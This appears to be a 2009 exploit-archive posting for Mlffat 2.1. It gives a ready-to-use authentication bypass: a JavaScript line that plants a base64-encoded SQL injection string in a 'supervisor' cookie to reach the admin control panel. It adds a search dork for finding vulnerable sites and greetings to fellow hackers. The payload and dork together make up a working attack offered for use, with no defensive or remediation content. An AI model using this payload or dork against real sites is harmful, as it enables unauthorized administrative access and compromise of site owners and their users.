[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Mlffat 2.1 (Auth Bypass / Cookie) SQL Injection Vulnerability
# Published : 2009-05-13
# Author : Qabandi
# Previous Title : MaxCMS 2.0 (m_username) Arbitrary Create Admin Exploit
# Next Title : Bitweaver <= 2.6 saveFeed() Remote Code Execution Exploit


||          ||   | ||        
           o_,_7 _||  . _o_7 _|| q_|_||  o_w_,
          ( :   /    (_)    /           (   .  


######################################################
#	MLFFAT 2.1 - insecure Cookie Handling     
# 			 	     
######################################################
#	     Qabandi   | iqa[a]hotmail.fr	     
                From Kuwait, Peace.
  Salamz: Killer Hack, Ghost-R00t, Mr.Mn7os, all Muslims
######################################################
Buy:  http://mlffat.com/emm/index.php?action=order
Dork: "Powered by mlffat"
------------------------------------------------------
-:PoC:-

javascript:document.cookie = "supervisor=OmFkbWluJyBvciAnMSc9JzE6MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM="

AdminCP: ./cpanel/index.php


----------> La tsta3mluha 3la al mowaqi3 el islamiya <-------------

# www.Syue.com [2009-05-13]